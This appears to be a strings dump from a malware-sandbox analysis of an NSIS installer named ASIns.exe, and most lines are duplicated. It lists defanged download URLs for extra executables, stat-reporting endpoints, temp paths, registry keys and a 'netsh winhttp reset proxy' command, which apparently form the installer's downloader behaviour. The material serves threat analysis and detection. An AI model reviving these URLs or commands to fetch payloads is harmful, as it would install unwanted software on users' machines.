CERT_SELECT_DIALOG
CAPI_LOAD_PRIVKEY
CAPI_LOAD_PRIVKEY
CAPI_GET_PKEY
CAPI_GET_PKEY
CAPI_GET_KEY
CAPI_GET_KEY
CAPI_CERT_GET_FNAME
CAPI_CERT_GET_FNAME
capi_get_provname, returned name=%s, type=%d
capi_get_provname, returned name=%s, type=%d
capi_get_provname, index=%d
capi_get_provname, index=%d
%d. %s, type %d
%d. %s, type %d
Container Name: %s, Key Type %d
Container Name: %s, Key Type %d
Provider Name: %s, Provider Type %d
Provider Name: %s, Provider Type %d
Private Key Info:
Private Key Info:
No Private Key
No Private Key
%d. %s
%d. %s
Container name %s, len=%d, index=%d, flags=%d
Container name %s, len=%d, index=%d, flags=%d
Got max container len %d
Got max container len %d
Listing containers CSP=%s, type = %d
Listing containers CSP=%s, type = %d
capi_cert_get_fname
capi_cert_get_fname
Friendly Name "%s"
Friendly Name "%s"
Opening certificate store %s
Opening certificate store %s
capi_get_key, contname=%s, provname=%s, type=%d
capi_get_key, contname=%s, provname=%s, type=%d
capi_ctx_set_provname, name=%s, type=%d
capi_ctx_set_provname, name=%s, type=%d
aiKeyAlg=0x
aiKeyAlg=0x
Certificate %d
Certificate %d
Listing certs for store %s
Listing certs for store %s
Can't Parse Certificate %d
Can't Parse Certificate %d
Setting key type to %d
Setting key type to %d
Setting debug file to %s
Setting debug file to %s
Setting debug level to %d
Setting debug level to %d
Setting flags to %d
Setting flags to %d
Setting store name to %s
Setting store name to %s
unsupported parameter set
unsupported parameter set
unsupported cipher ctl command
unsupported cipher ctl command
public key undefined
public key undefined
no private part of non ephemeral keypair
no private part of non ephemeral keypair
no peer key
no peer key
mac key not set
mac key not set
key parameters missing
key parameters missing
key is not initialized
key is not initialized
key is not initalized
key is not initalized
invalid mac key length
invalid mac key length
incompatible peer key
incompatible peer key
error parsing key transport info
error parsing key transport info
error packing key transport info
error packing key transport info
error computing shared key
error computing shared key
cannot pack ephemeral key
cannot pack ephemeral key
bad pkey parameters format
bad pkey parameters format
bad key parameters format
bad key parameters format
PKEY_GOST_MAC_KEYGEN
PKEY_GOST_MAC_KEYGEN
PKEY_GOST_MAC_CTRL_STR
PKEY_GOST_MAC_CTRL_STR
PKEY_GOST_MAC_CTRL
PKEY_GOST_MAC_CTRL
PKEY_GOST_CTRL94_STR
PKEY_GOST_CTRL94_STR
PKEY_GOST_CTRL01_STR
PKEY_GOST_CTRL01_STR
PKEY_GOST_CTRL
PKEY_GOST_CTRL
PKEY_GOST94_PARAMGEN
PKEY_GOST94_PARAMGEN
PKEY_GOST94CP_KEYGEN
PKEY_GOST94CP_KEYGEN
PKEY_GOST94CP_ENCRYPT
PKEY_GOST94CP_ENCRYPT
PKEY_GOST94CP_DECRYPT
PKEY_GOST94CP_DECRYPT
PKEY_GOST2001_DERIVE
PKEY_GOST2001_DERIVE
PKEY_GOST01_PARAMGEN
PKEY_GOST01_PARAMGEN
PKEY_GOST01CP_KEYGEN
PKEY_GOST01CP_KEYGEN
PKEY_GOST01CP_ENCRYPT
PKEY_GOST01CP_ENCRYPT
PKEY_GOST01CP_DECRYPT
PKEY_GOST01CP_DECRYPT
GOST2001_KEYGEN
GOST2001_KEYGEN
.\engines\ccgost\gost2001_keyx.c
.\engines\ccgost\gost2001_keyx.c
gkt->key_info->imit->length==4
gkt->key_info->imit->length==4
gkt->key_info->encrypted_key->length==32
gkt->key_info->encrypted_key->length==32
gkt->key_agreement_info->eph_iv->length==8
gkt->key_agreement_info->eph_iv->length==8
.\engines\ccgost\gost94_keyx.c
.\engines\ccgost\gost94_keyx.c
Parameter set: %s
Parameter set: %s
Public key:
Public key:
Private key:
Private key:
Public key:
Public key:
GOST_CLIENT_KEY_EXCHANGE_PARAMS
GOST_CLIENT_KEY_EXCHANGE_PARAMS
GOST_KEY_PARAMS
GOST_KEY_PARAMS
key_params
key_params
GOST_KEY_AGREEMENT_INFO
GOST_KEY_AGREEMENT_INFO
ephem_key
ephem_key
GOST_KEY_INFO
GOST_KEY_INFO
encrypted_key
encrypted_key
GOST_KEY_TRANSPORT
GOST_KEY_TRANSPORT
key_agreement_info
key_agreement_info
key_info
key_info
ENGINE_set_cmd_defns failed
ENGINE_set_cmd_defns failed
ENGINE_set_pkey_asn1_meths failed
ENGINE_set_pkey_asn1_meths failed
ENGINE_set_pkey_meths failed
ENGINE_set_pkey_meths failed
c:\toolchain\src\openssl-1.0.1g\openssl-1.0.1g\out32dll\libeay32.pdb
c:\toolchain\src\openssl-1.0.1g\openssl-1.0.1g\out32dll\libeay32.pdb
l}C.we
l}C.we
s>.Vb
s>.Vb
Operation not permitted
Operation not permitted
Inappropriate I/O control opera
Inappropriate I/O control opera
Broken pipe
Broken pipe
CryptDestroyKey
CryptDestroyKey
ReportEventA
ReportEventA
CryptExportKey
CryptExportKey
CryptGetUserKey
CryptGetUserKey
CertFreeCertificateContext
CertFreeCertificateContext
CertGetCertificateContextProperty
CertGetCertificateContextProperty
CertOpenStore
CertOpenStore
CertFindCertificateInStore
CertFindCertificateInStore
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertCloseStore
CertCloseStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
_malloc_crt
_malloc_crt
_amsg_exit
_amsg_exit
_crt_debugger_hook
_crt_debugger_hook
GetProcessWindowStation
GetProcessWindowStation
484484484445
484484484445
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
ASIns.exe_960:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse4.tmp\inetc.dll
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse4.tmp\inetc.dll
t_id\": \"3506\",\"guid\": \"A3394D56-9DC4-C0DB-F8C9-C2A191FB2F96\",\"channel_id\": \"IMR1\", \"utm_addition\":\"pr=vo&v=39&civ=2&pac=AS\"}"}
t_id\": \"3506\",\"guid\": \"A3394D56-9DC4-C0DB-F8C9-C2A191FB2F96\",\"channel_id\": \"IMR1\", \"utm_addition\":\"pr=vo&v=39&civ=2&pac=AS\"}"}
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse4.tmp\inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse4.tmp\inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse4.tmp
1FB2F96\Uninstall.exe
1FB2F96\Uninstall.exe
y7S?
y7S?
.SY?X
.SY?X
Pe%CV
Pe%CV
R.Jx7
R.Jx7
data: %d%%
data: %d%%
fi.lx]Yr
fi.lx]Yr
SLJ%U
SLJ%U
4>sQL
4>sQL
%Program Files%\A3394D56-1447904725-C0DB-F8C9-C2A191FB2F96\nsl2B.tmp
%Program Files%\A3394D56-1447904725-C0DB-F8C9-C2A191FB2F96\nsl2B.tmp
Uninstall.exe
Uninstall.exe
UNINST~1.EXE
UNINST~1.EXE
1646712
1646712
13092378325
13092378325
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg24.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg24.tmp
hXXp://livestatscounter.com/vuupc/stats.php
hXXp://livestatscounter.com/vuupc/stats.php
9-4D2B-BAFF-849D813DA590}\ASIns.exe" /p=AS /start /ch=IMR1
9-4D2B-BAFF-849D813DA590}\ASIns.exe" /p=AS /start /ch=IMR1
3 4 5 6 7 8 9 10 11
3 4 5 6 7 8 9 10 11
sl2B.tmp
sl2B.tmp
otal Commander.lnk
otal Commander.lnk
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{4991D59D-7589-4D2B-BAFF-849D813DA590}\ASIns.exe" /p=AS /start /ch=IMR1
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{4991D59D-7589-4D2B-BAFF-849D813DA590}\ASIns.exe" /p=AS /start /ch=IMR1
%Program Files%\A3394D56-1447904725-C0DB-F8C9-C2A191FB2F96
%Program Files%\A3394D56-1447904725-C0DB-F8C9-C2A191FB2F96
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{4991D59D-7589-4D2B-BAFF-849D813DA590}
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{4991D59D-7589-4D2B-BAFF-849D813DA590}
ASIns.exe
ASIns.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg1.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{4991D59D-7589-4D2B-BAFF-849D813DA590}\ASIns.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{4991D59D-7589-4D2B-BAFF-849D813DA590}\ASIns.exe
A3394D56-9DC4-C0DB-F8C9-C2A191FB2F96
A3394D56-9DC4-C0DB-F8C9-C2A191FB2F96
%Documents and Settings%\%current user%\Application Data\ASPackage
%Documents and Settings%\%current user%\Application Data\ASPackage
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\heu39T.nss
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\heu39T.nss
1447904724
1447904724
%Program Files%\A3394D56-1447904725-C0DB-F8C9-C2A191FB2F96\vnsl2B.tmp
%Program Files%\A3394D56-1447904725-C0DB-F8C9-C2A191FB2F96\vnsl2B.tmp
4417904720
4417904720
1447904720
1447904720
7904720
7904720
1447904723
1447904723
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst6.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst6.tmp
1447904725
1447904725
hXXp://livestatscounter.com/SysInfo/reportstatus.php?uid=
hXXp://livestatscounter.com/SysInfo/reportstatus.php?uid=
hXXp://livestatscounter.com/SysInfo/count_vn.php?ch=test
hXXp://livestatscounter.com/SysInfo/count_vn.php?ch=test
hXXp://livestatscounter.com/SysInfo/count_vc.php?ch=test
hXXp://livestatscounter.com/SysInfo/count_vc.php?ch=test
hXXp://livestatscounter.com/SysInfo/glob.php?ch=test&sof=4
hXXp://livestatscounter.com/SysInfo/glob.php?ch=test&sof=4
hXXp://dml07j8fsmdyl.cloudfront.net/VOsrv.exe
hXXp://dml07j8fsmdyl.cloudfront.net/VOsrv.exe
hXXp://d3b98uxelh2q3f.cloudfront.net/runasu.exe
hXXp://d3b98uxelh2q3f.cloudfront.net/runasu.exe
hXXp://d1mdi78qyff344.cloudfront.net/JOSrv.exe
hXXp://d1mdi78qyff344.cloudfront.net/JOSrv.exe
hXXp://VVV.livestatscounter.com/SysInfo/hpstats.php
hXXp://VVV.livestatscounter.com/SysInfo/hpstats.php
hXXp://VVV.vuupc.com/download_exe.php?sid=
hXXp://VVV.vuupc.com/download_exe.php?sid=
hXXp://VVV.download-servers.com/vuupc/dl.php?r=vu_vo2_
hXXp://VVV.download-servers.com/vuupc/dl.php?r=vu_vo2_
hXXp://VVV.anyprotect.com/dl.php?pr=sc&r=vu_vo2_i_
hXXp://VVV.anyprotect.com/dl.php?pr=sc&r=vu_vo2_i_
hXXp://d1mdi78qyff344.cloudfront.net/WinCheckSetup.exe
hXXp://d1mdi78qyff344.cloudfront.net/WinCheckSetup.exe
hXXp://d1mdi78qyff344.cloudfront.net/ConvertAdSetup.exe
hXXp://d1mdi78qyff344.cloudfront.net/ConvertAdSetup.exe
hXXp://VVV.download-servers.com/SysInfo/igsSetupSingle.exe
hXXp://VVV.download-servers.com/SysInfo/igsSetupSingle.exe
hXXp://d1mdi78qyff344.cloudfront.net/SFSetup.exe
hXXp://d1mdi78qyff344.cloudfront.net/SFSetup.exe
hXXp://livestatscounter.com/vuupc/dl.php?r=vu_vo2_
hXXp://livestatscounter.com/vuupc/dl.php?r=vu_vo2_
hXXp://livestatscounter.com/vuupc/dljo.php?r=vu_vo2_
hXXp://livestatscounter.com/vuupc/dljo.php?r=vu_vo2_
hXXp://livestatscounter.com/countstats/count.php
hXXp://livestatscounter.com/countstats/count.php
hXXp://livestatscounter.com/vuupc/dls.php?r=vu_vo2_
hXXp://livestatscounter.com/vuupc/dls.php?r=vu_vo2_
hXXp://d1mdi78qyff344.cloudfront.net/IGSrv.exe
hXXp://d1mdi78qyff344.cloudfront.net/IGSrv.exe
hXXp://livestatscounter.com/SysInfo/affiliate_stats.php
hXXp://livestatscounter.com/SysInfo/affiliate_stats.php
hXXp://d1mdi78qyff344.cloudfront.net/CASrv.exe
hXXp://d1mdi78qyff344.cloudfront.net/CASrv.exe
hXXp://d1mdi78qyff344.cloudfront.net/SU_Srv.exe
hXXp://d1mdi78qyff344.cloudfront.net/SU_Srv.exe
hXXp://d1mdi78qyff344.cloudfront.net/Update_Notifier.exe
hXXp://d1mdi78qyff344.cloudfront.net/Update_Notifier.exe
hXXp://config.anysend.com/dlbase.path
hXXp://config.anysend.com/dlbase.path
hXXp://d1mdi78qyff344.cloudfront.net/AWSrv.exe
hXXp://d1mdi78qyff344.cloudfront.net/AWSrv.exe
hXXp://mobilitydata5.com/vuupc/dlswe.php?r=WE_ASWD
hXXp://mobilitydata5.com/vuupc/dlswe.php?r=WE_ASWD
hXXp://livestatscounter.com/vuupc/dle.php?r=vu_vo2_
hXXp://livestatscounter.com/vuupc/dle.php?r=vu_vo2_
hXXp://d16hr9n7t75k58.cloudfront.net/Note-UP_Setup.exe
hXXp://d16hr9n7t75k58.cloudfront.net/Note-UP_Setup.exe
11644473600
11644473600
{"table": "event_has_user","data": "{\"event_event_id\": \"3506\",\"guid\": \"A3394D56-9DC4-C0DB-F8C9-C2A191FB2F96\",\"channel_id\": \"IMR1\", \"utm_addition\":\"pr=vo&v=39&civ=2&pac=AS\"}"}
{"table": "event_has_user","data": "{\"event_event_id\": \"3506\",\"guid\": \"A3394D56-9DC4-C0DB-F8C9-C2A191FB2F96\",\"channel_id\": \"IMR1\", \"utm_addition\":\"pr=vo&v=39&civ=2&pac=AS\"}"}
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2C.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2C.tmp
\Screencast-O-Matic\Screencast-O-Matic.exe
\Screencast-O-Matic\Screencast-O-Matic.exe
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall
netsh winhttp reset proxy
netsh winhttp reset proxy
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Nullsoft Install System v2.46
Nullsoft Install System v2.46
ASIns.exe_960_rwx_10004000_00001000:
callback%d
callback%d